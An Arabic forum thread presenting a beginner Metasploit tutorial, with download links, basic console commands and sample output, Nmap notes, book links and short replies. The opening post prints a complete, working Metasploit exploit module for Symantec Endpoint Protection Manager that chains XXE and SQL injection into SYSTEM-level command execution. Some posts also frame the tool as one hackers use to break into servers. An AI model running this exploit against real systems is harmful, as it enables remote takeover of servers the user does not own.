حالة الموضوع:
مغلق
  1. or0

    or0 V • I • P

    الأنتساب:
    ‏22 فبراير 2014
    المشاركات:
    392
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    18
    IQ_tema











    السلام عليكم ورحمه الله وبركاته ...​


    1- تحميل الميتا سبوليت للويندوز واللينكس .
    2- دروس في الميتا سبلويت .
    3- كتابين لـ تعليم Metasploit .


    اولا : تحميل الميتا سبلويت للويندوز واللينكس :

    قبل ان نبدأ الدروس , عليك ان تمتلك الميتا سبلويت للتعويد على كتابة الاوامر والادوات داخل الميتا سبلويت , فقبل كل شيء قم بتحميل اخر اصدار للميتا سبلويت 4.8.2 :

    1- لنظام الويندوز :
    من الرابط : http://downloads.metasploit.com/data/releases/archive/metasploit-4.8.2-windows-installer.exe

    2-لنظام اللينكس :
    http://downloads.metasploit.com/data/releases/archive/metasploit-4.8.2-linux-installer.run

    3- لنظام اللينكس 64 بت :
    http://downloads.metasploit.com/data/releases/archive/metasploit-4.8.2-linux-x64-installer.run

    ويمكنك الدخول على الرابط التالي للتأكد من وجود اصدار جديد , علما ان هذا الاصدار اخر مرة تحقق منه في تاريخ 2014-2-20 :
    رابط : https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version



    ثانيا : دروس تعليمية للميتا سبلويت :

    مقدمة ومفاهيم عن الميتا سبلويت :

    الـ ميتا سبوليت Metasploit Framework :

    الميتا سبلويت هي Framework مشروع بدأ في سنة 2003 , وقد شهد تطورات تدريجية من ذلك الوقت لحد الان , وتحتوي الميتا سبلويت على العديد من ثغرات لفحص الانظمة والشبكات العديدة والانواع الاخرى من الثغرات .
    والميتا سبلويت هو مشروع قوي جدا , ومساعد القراصنة على فحص الانظمة والشبكات واكتشاف الثغرات .
    وقد جعل الكثير من القراصنة استغلاله في اختراق الاجهزة والسيرفرات من خلال استغلال ثغرات الانظمة والثغرات الاخرى المكتشفة في الميتا سبوليت .
    وايضا الميتا سبلوت تمكن المستخدمين من اضافة ثغرات جديدة للمشروع لأطلاقها في اصدارات جديدة للمشروع .
    والميتا سبلويت بأختصار " اختبار الاختراق للاجهزة والشبكات والانظمة والخوادم و الفحوصات العامة في الويب وعالم الثغرات والاختراق ..."

    وتستخدم الميتا سبلويت لغة البيرل والبايثون وغيرها من اللغات لصنع الثغرات واستغلالها , ويوجد الكثير من ثغرات الميتا سبلويت الموجودة في موقع exploit-db , مثال لثغرة موجودة في الميتا سبلويت :
    اسم الثغرة : Symantec Endpoint Protection Manager - Remote Command Execution

    كود الثغرة :
    كود:
    require 'msf/core'
    require 'msf/core/exploit/powershell'
     
    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking
     
      include REXML
      include Msf::Exploit::CmdStagerVBS
      include Msf::Exploit::Remote::HttpClient
     
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'Symantec Endpoint Protection Manager Remote Command Execution',
          'Description'    => %q{
            This module exploits XXE and SQL injection flaws in Symantec Endpoint Protection Manager
            versions 11.0, 12.0 and 12.1. When supplying a specially crafted XXE request an attacker
            can reach SQL injection affected components. As xp_cmdshell is enabled in the included
            database instance, it's possible to execute arbitrary system commands on the remote system
            with SYSTEM privileges.
          },
          'Author'         =>
            [
              'Stefan Viehbock', # Discovery
              'Chris Graham', # PoC exploit
              'xistence <xistence[at]0x90.nl>' # Metasploit module
            ],
          'License'        => MSF_LICENSE,
          'References'     =>
            [
              [ 'CVE', '2013-5014' ],
              [ 'CVE', '2013-5015' ],
              [ 'EDB', '31853'],
              [ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140218-0_Symantec_Endpoint_Protection_Multiple_critical_vulnerabilities_wo_poc_v10.txt' ]
            ],
          'Arch'           => ARCH_X86,
          'Platform'       => 'win',
          'Targets'        =>
            [
              ['Windows VBS Stager', {}]
            ],
          'Privileged'     => true,
          'DisclosureDate' => 'Feb 24 2014',
          'DefaultTarget'  => 0))
     
        register_options(
          [
            Opt::RPORT(9090),
            OptString.new('TARGETURI', [true, 'The base path', '/'])
          ], self.class)
      end
     
      def check
        res = send_request_cgi(
          {
            'uri'   =>  normalize_uri(target_uri.path),
            'method' => 'GET',
          })
     
        if res && res.code == 200 && res.body =~ /Symantec Endpoint Protection Manager/ && res.body =~ /1995 - 2013 Symantec Corporation/
          return Exploit::CheckCode::Appears
        end
     
        Exploit::CheckCode::Safe
      end
     
      def exploit
        print_status("#{peer} - Sending payload")
        # Execute the cmdstager, max length of the commands is ~3950
        execute_cmdstager({:linemax => 3950})
      end
     
      def execute_command(cmd, opts = {})
        # Convert the command data to hex, so we can use that in the xp_cmdshell. Else characters like '>' will be harder to bypass in the XML.
        command = "0x#{Rex::Text.to_hex("cmd /c #{cmd}", '')}"
     
        # Generate random 'xx032xxxx' sequence number.
        seqnum = "#{rand_text_numeric(2)}032#{rand_text_numeric(4)}"
     
        soap = soap_request(seqnum, command)
     
        post_data = Rex::MIME::Message.new
        post_data.add_part(soap, "text/xml", nil, "form-data; name=\"Content\"")
        xxe = post_data.to_s
     
        res = send_request_cgi(
          {
            'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
            'method' => 'POST',
            'vars_get' => { 'ActionType' => 'ConsoleLog' },
            'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
            'data' => xxe,
          })
     
        if res and res.body !~ /ResponseCode/
          fail_with(Failure::Unknown, "#{peer} - Something went wrong.")
        end
      end
     
      def soap_request(seqnum, command)
        randpayload = rand_text_alpha(8+rand(8))
        randxxe = rand_text_alpha(8+rand(8))
        entity = "<!ENTITY #{randpayload} SYSTEM \"http://127.0.0.1:9090/servlet/ConsoleServlet?"
        entity << "ActionType=ConfigServer&action=test_av&SequenceNum=#{seqnum}&Parameter=';call xp_cmdshell(#{command});--\" >"
     
        xml = Document.new
        xml.add(DocType.new('sepm', "[ METASPLOIT ]"))
        xml.add_element("Request")
        xxe = xml.root.add_element(randxxe)
        xxe.text = "PAYLOAD"
     
        xml_s = xml.to_s
        xml_s.gsub!(/METASPLOIT/, entity) # To avoid html encoding
        xml_s.gsub!(/PAYLOAD/, "&#{randpayload};") # To avoid html encoding
     
        xml_s
      end
     
    end
    هذا الكود عبارة عن تعليمات برمجية مكتوبة بأحد لغات البرمجة , وتستخدم في الميتا سبلويت لآستغلال السيرفرات المصابة بهذه الثغرة .

    ويمكنك انت بنفسك صنع وكتابة ثغرات ونشرها في مشروع الميتا سبلوت .



    الاكواد والاوامر الاساسية في الميتا سبلوت :

    0- كود اظهار التفاصيل في الميتا سبلويت :
    كود:
    Msfconsole
    1- كود اظهار جميع الثغرات الموجودة في الميتا سبلويت :
    كود:
    show exploits
    2- كود اظهار البايلود في الميتا سبلويت :
    كود:
    show payloads
    * البايلود هو اظهار صلاحيات الثغرة .

    3- كود اظهار ثغرات الفحص :
    كود:
    show auxiliary 
    *ثغرات الفحص المقصود بها هي اظهار ثغرات الي تفحص البورتات والمنافذ للاجهزة والسيرفرات وثغرات الفحص الاخرى .

    4- كود استخدام ثغرة او بايلود :
    كود:
    use
    *يستخدم هذا الكود لأستخدام ثغرة مثلا :
    كود:
    use aplof\temp\exploit\tag
    ومعناها استخدم هذه الثغرة : aplof\temp\exploit\tag

    5- كود ضبط الاوامر والتعديل على خيارات الثغرة :
    كود:
    set
    مثال :
    كود:
    set LHOST 129.168.1.100
    ومعناه ضبط الـ Local Host الخاص بالـ يبي الجهاز , وممكن ضبط البورت ايضا وهناك اعدادات للضبط , وجميع الاعدادات بسيطة .
    6- كود اظهار الخيارات :
    كود:
    show options 
    * اظهار خيارات الثغرة , او خيارات الاعدادات او ... .

    7- كود اظهار ثغرات التشفير :
    كود:
    show encoders
    8- كود اظهار ألـنوبس :
    كود:
    show nops 
    * يستخدم لغرض عرض مكونات او مولدات الـnops .

    9- اكواد اخرى سريعة لا داعي لشرحها فقط معرفة بالانجليزية للكلمات , ومنقولة من كتاب صانعي مشروع الميتا سبلويت :
    كود:
       Command               Description                                         
       -------               -----------                                         
       db_add_host           Add one or more hosts to the database               
       db_add_note           Add a note to host                                  
       db_add_port           Add a port to host                                  
       db_autopwn            Automatically exploit everything                    
       db_hosts              List all hosts in the database                      
       db_import_nessus_nbe  Import a Nessus scan result file (NBE)              
       db_import_nmap_xml    Import a Nmap scan results file (-oX)               
       db_nmap               Executes nmap and records the output automatically  
       db_notes              List all notes in the database                      
       db_services           List all services in the database                   
       db_vulns              List all vulnerabilities in the database
    10- كود الرجوع :
    كود:
    back
    11- كود العرض والمشاهدة في الرئيسية :
    كود:
    banner
    مثال :
    كود:
    msf > banner
    
    Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with
    Metasploit Pro -- type 'go_pro' to launch it now.
    
           =[ metasploit v4.8.2-2014021901 [core:4.8 api:1.0] ]
    + -- --=[ 1265 exploits - 695 auxiliary - 202 post ]
    + -- --=[ 330 payloads - 32 encoders - 8 nops      ]
    12- كود التحقق :
    كود:
    check
    مثأل :
    كود:
    msf exploit(ms08_067_netapi) > show options
    
    Module options (exploit/windows/smb/ms08_067_netapi):
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       RHOST    172.16.194.134   yes       The target address
       RPORT    445              yes       Set the SMB service port
       SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic Targeting
    
    
    msf exploit(ms08_067_netapi) > check
    
    [*] Verifying vulnerable status... (path: 0x0000005a)
    [*] System is not vulnerable (status: 0x00000000)
    [*] The target is not exploitable.
    msf  exploit(ms08_067_netapi) >
    
    13- كود ضبط اللون :
    كود:
    color
    مثال :
    كود:
    msf > banner
    Usage: color <'true'|'false'|'auto'>
    
    Enable or disable color output.
    14- كود الاتصال :
    كود:
    connect
    * يتم عبر الايبي والبورت , مثال :
    كود:
    msf > connect 192.168.1.1 23
    [*] Connected to 192.168.1.1:23
    DD-WRT v24 std (c) 2008 NewMedia-NET GmbH
    Release: 07/27/08 (SVN revision: 10011)
    DD-WRT login:
    15- كود اظهار المعلومات :
    كود:
    info
    * يستخدم لآظهار المعلومات او معلومات الثغرة , مثال :
    كود:
    msf  exploit(ms09_050_smb2_negotiate_func_index) > info exploit/windows/smb/ms09_050_smb2_negotiate_func_index 
    
           Name: Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
         Module: exploit/windows/smb/ms09_050_smb2_negotiate_func_index
        Version: 14774
       Platform: Windows
     Privileged: Yes
        License: Metasploit Framework License (BSD)
           Rank: Good
    
    Provided by:
      Laurent Gaffie 
      hdm 
      sf 
    
    Available targets:
      Id  Name
      --  ----
      0   Windows Vista SP1/SP2 and Server 2008 (x86)
    
    Basic options:
      Name   Current Setting  Required  Description
      ----   ---------------  --------  -----------
      RHOST                   yes       The target address
      RPORT  445              yes       The target port
      WAIT   180              yes       The number of seconds to wait for the attack to complete.
    
    Payload information:
      Space: 1024
    
    Description:
      This module exploits an out of bounds function table dereference in 
      the SMB request validation code of the SRV2.SYS driver included with 
      Windows Vista, Windows 7 release candidates (not RTM), and Windows 
      2008 Server prior to R2. Windows Vista without SP1 does not seem 
      affected by this flaw.
    
    References:
      http://www.microsoft.com/technet/security/bulletin/MS09-050.mspx
      http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-3103
      http://www.securityfocus.com/bid/36299
      http://www.osvdb.org/57799
      http://seclists.org/fulldisclosure/2009/Sep/0039.html
      http://www.microsoft.com/technet/security/Bulletin/MS09-050.mspx
    
    msf  exploit(ms09_050_smb2_negotiate_func_index) >
    16 - كود استيراد الاضافات :
    كود:
    load
    مثال :
    كود:
    msf > load
    Usage: load <path> [var=val var=val ...]
    
    Loads a plugin from the supplied path.  If path is not absolute, first looks
    in the user's plugin directory (/root/.msf4/plugins) then
    in the framework root plugin directory (/usr/share/metasploit-framework/plugins).
    The optional var=val options are custom parameters that can be passed to plugins.
    
    msf > load pcap_log
    [*] PcapLog plugin loaded.
    [*] Successfully loaded plugin: pcap_log
    
    17- كود استيراد اضافات في المسارات :
    كود:
    loadpath
    مثال :
    كود:
    msf > loadpath /home/secret/modules
    
    Loaded 0 modules.
    18- كود عدم الاستيراد :
    كود:
    unload
    مثال :
    كود:
    msf > unload pcap_log
    Unloading plugin pcap_log...unloaded.
    19- كود التعديل والسماح والضبط في الـ Socks والـ Session :
    كود:
    route
    مثال :
    كود:
    meterpreter > route -h
    Usage: route [-h] command [args]
    
    Display or modify the routing table on the remote machine.
    
    Supported commands:
    
       add    [subnet] [netmask] [gateway]
       delete [subnet] [netmask] [gateway]
       list
    
    meterpreter >
    meterpreter > route
    
    Network routes
    ==============
    
        Subnet           Netmask          Gateway
        ------           -------          -------
        0.0.0.0          0.0.0.0          172.16.1.254
        127.0.0.0        255.0.0.0        127.0.0.1
        172.16.1.0       255.255.255.0    172.16.1.100
        172.16.1.100     255.255.255.255  127.0.0.1
        172.16.255.255   255.255.255.255  172.16.1.100
        224.0.0.0        240.0.0.0        172.16.1.100
        255.255.255.255  255.255.255.255  172.16.1.100
    
    20- كود البحث :
    كود:
    Search
    مثال :
    كود:
    msf > search usermap_script
    
    Matching Modules
    ================
    
       Name                                Disclosure Date  Rank       Description
       ----                                ---------------  ----       -----------
       exploit/multi/samba/usermap_script  2007-05-14       excellent  Samba "username map script" Command Execution
    
    
    msf >
    21- كود المساعدة :
    كود:
    Help
    مثال :
    كود:
    msf > help search
    Usage: search [keywords]
    
    Keywords:
      name      :  Modules with a matching descriptive name
      path      :  Modules with a matching path or reference name
      platform  :  Modules affecting this platform
      type      :  Modules of a specific type (exploit, auxiliary, or post)
      app       :  Modules that are client or server attacks
      author    :  Modules written by this author
      cve       :  Modules with a matching CVE ID
      bid       :  Modules with a matching Bugtraq ID
      osvdb     :  Modules with a matching OSVDB ID
    
    Examples:
      search cve:2009 type:exploit app:client
    
    msf >
    22- كود البحث بواسطة الاسم :
    كود:
    Name
    مثال :
    كود:
    msf > search name:mysql
    
    Matching Modules
    ================
    
       Name                                               Disclosure Date  Rank       Description
       ----                                               ---------------  ----       -----------
       auxiliary/admin/mysql/mysql_enum                                    normal     MySQL Enumeration Module
       auxiliary/admin/mysql/mysql_sql                                     normal     MySQL SQL Generic Query
       auxiliary/analyze/jtr_mysql_fast                                    normal     John the Ripper MySQL Password Cracker (Fast Mode)
       auxiliary/scanner/mysql/mysql_authbypass_hashdump  2012-06-09       normal     MySQL Authentication Bypass Password Dump
       auxiliary/scanner/mysql/mysql_hashdump                              normal     MYSQL Password Hashdump
       auxiliary/scanner/mysql/mysql_login                                 normal     MySQL Login Utility
       auxiliary/scanner/mysql/mysql_schemadump                            normal     MYSQL Schema Dump
       auxiliary/scanner/mysql/mysql_version                               normal     MySQL Server Version Enumeration
       exploit/linux/mysql/mysql_yassl_getname            2010-01-25       good       MySQL yaSSL CertDecoder::GetName Buffer Overflow
       exploit/linux/mysql/mysql_yassl_hello              2008-01-04       good       MySQL yaSSL SSL Hello Message Buffer Overflow
       exploit/windows/mysql/mysql_payload                2009-01-16       excellent  Oracle MySQL for Microsoft Windows Payload Execution
       exploit/windows/mysql/mysql_yassl_hello            2008-01-04       average    MySQL yaSSL SSL Hello Message Buffer Overflow
    msf > 
    23- كود البحث بواسطة المسار :
    كود:
    Path
    مثال :
    كود:
    msf > search path:scada
    
    Matching Modules
    ================
    
       Name                                                 Disclosure Date  Rank     Description
       ----                                                 ---------------  ----     -----------
       auxiliary/admin/scada/igss_exec_17                   2011-03-21       normal   Interactive Graphical SCADA System Remote Command Injection
       exploit/windows/scada/citect_scada_odbc              2008-06-11       normal   CitectSCADA/CitectFacilities ODBC Buffer Overflow
    ...snip...
    24- كود فلترة نوع البحث حسب النوع :
    كود:
    type
    مثال :
    كود:
    msf > search type:post
    
    Matching Modules
    ================
    
       Name                                                Disclosure Date  Rank    Description
       ----                                                ---------------  ----    -----------
       post/linux/gather/checkvm                                            normal  Linux Gather Virtual Environment Detection
       post/linux/gather/enum_cron                                          normal  Linux Cron Job Enumeration
       post/linux/gather/enum_linux                                         normal  Linux Gather System Information
    ...snip...
    25- كود البحث بواسطة الصانع للثغرة :
    كود:
    author
    مثال :
    كود:
    msf > search author:dookie
    
    Matching Modules
    ================
    
       Name                                                       Disclosure Date  Rank     Description
       ----                                                       ---------------  ----     -----------
       exploit/osx/http/evocam_webserver                          2010-06-01       average  MacOS X EvoCam HTTP GET Buffer Overflow
       exploit/osx/misc/ufo_ai                                    2009-10-28       average  UFO: Alien Invasion IRC Client Buffer Overflow Exploit
       exploit/windows/browser/amaya_bdo                          2009-01-28       normal   Amaya Browser v11.0 bdo tag overflow
    ...snip...

    شرح اداة Nmap :
    اداة Nmap هي اداة لعمل فحص كامل للموقع المستهدف او السيرفر او الجهاز .

    وأهم المهمات التي تستعمل في هذه الاداة هي :
    1- معرفة البورتات المفتوحة .
    2- معرفة معلومات النظام .
    3- معرفة البرامج الموجودة على السيرفر والبورت الذي يعمل عليه .
    4- وعمل فحص كامل لباقي المعلومات .

    ولمعرفة طريقة استعمال هذه الاداة اكتب في موجه الاوامر للميتا سبلويت الأمر التالي :
    كود:
    Info nmap

    كتابين pdf لـ Metasploit :



    1- كتاب Metasploit User Guide 3.2 :
    الاصدار : 3.2
    الصيغة :pdf
    الكتاب مهم ومفيد وهو الكتاب الرسمي من صانعي الميتا سبلويت .
    التحميل : http://dev.metasploit.com/documents/users_guide.pdf




    2- كتاب Metasploit Guide :
    هو كتاب يشرح استخدام الاوامر والثغرات مع تطبيقات على ثغرات في الميتا سبلويت , هو كتاب مفيد لزيادة التعليم في الميتا سبلويت :
    الكتاب بصيغة pdf
    تحميله من الرابط التالي : http://dl.packetstormsecurity.net/papers/general/MetasploitGuide.pdf



    كنت ارغب في زيادة الدروس , واعتذر لقلتها , وشكرا للمتابعة وحظ موفق في تعليم الميتا سبلويت .

    سلام .​
     
    1 person likes this.
  2. NETJOURNAL

    NETJOURNAL مشرف

    الأنتساب:
    ‏18 مايو 2006
    المشاركات:
    676
    الإعجابات المتلقاة:
    1,543
    نقاط الجائزة:
    93
    الجنس:
    ذكر
    الوظيفة:
    ExploitCoding - ShellCoding - Defacer
    الإقامة:
    etc/shadow/~root
    رد: دروس تعليم الميتا سبلويت و تحميل Metasploit Framework للويندوز واللينكس و كتابين لـتعليم Meatsploit

    وعليكم ألسلام و رحمة الله و بركلتة .
    شرح ممتاز. عزيزي . بارك الله فيك .
    بس ينقل الى القسم الصحيح . ( اختبار الاختراق ).
     
  3. or0

    or0 V • I • P

    الأنتساب:
    ‏22 فبراير 2014
    المشاركات:
    392
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    18
    رد: دروس تعليم الميتا سبلويت و تحميل Metasploit Framework للويندوز واللينكس و كتابين لـتعليم Meatsploit


    شكرا للنقل .. كنت ابحث عن قسم اختبار الاختراق لكن لا اعرف لم الاحظه .

    على اي حال شكرا وبارك الله فيك ...
     
  4. CoMmAnDo AlMaSaBi

    CoMmAnDo AlMaSaBi DeveloPer Plus

    الأنتساب:
    ‏13 مايو 2013
    المشاركات:
    142
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    رد: دروس تعليم الميتا سبلويت و تحميل Metasploit Framework للويندوز واللينكس و كتابين لـتعليم Meatsploit

    وعليكم السلام
    بارك الله فيك اخي
    )5:")5:"
     
  5. خأإآلد

    خأإآلد DeveloPer Plus

    الأنتساب:
    ‏18 ديسمبر 2011
    المشاركات:
    108
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    18
    الإقامة:
    K.s.A
    رد: دروس تعليم الميتا سبلويت و تحميل Metasploit Framework للويندوز واللينكس و كتابين لـتعليم Meatsploit

    تِسلَـمْ أخِي
    بَاركـَ الله فِيكَ
     
  6. ρяoғеѕoя

    ρяoғеѕoя Developer

    الأنتساب:
    ‏2 ابريل 2012
    المشاركات:
    61
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    IQ-TEAM
    رد: دروس تعليم الميتا سبلويت و تحميل Metasploit Framework للويندوز واللينكس و كتابين لـتعليم Meatsploit

    موضوع في قمة الخيااال
    طرحت فابدعت
    دمت ودام عطائك
    ودائما بأنتظار جديدك الشيق :{1}:
     
  7. or0

    or0 V • I • P

    الأنتساب:
    ‏22 فبراير 2014
    المشاركات:
    392
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    18
    رد: دروس تعليم الميتا سبلويت و تحميل Metasploit Framework للويندوز واللينكس و كتابين لـتعليم Meatsploit



    شكرا ليكم ع المرور ....
    تحياتي .. !
     
  8. Murtadha Albejawe

    Murtadha Albejawe Developer

    الأنتساب:
    ‏28 يوليو 2012
    المشاركات:
    78
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    8
    الإقامة:
    $$$
    رد: دروس تعليم الميتا سبلويت و تحميل Metasploit Framework للويندوز واللينكس و كتابين لـتعليم Meatsploit

    تسلم على الشرح الرائع
    بارك الله فيك اخي !:"​
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة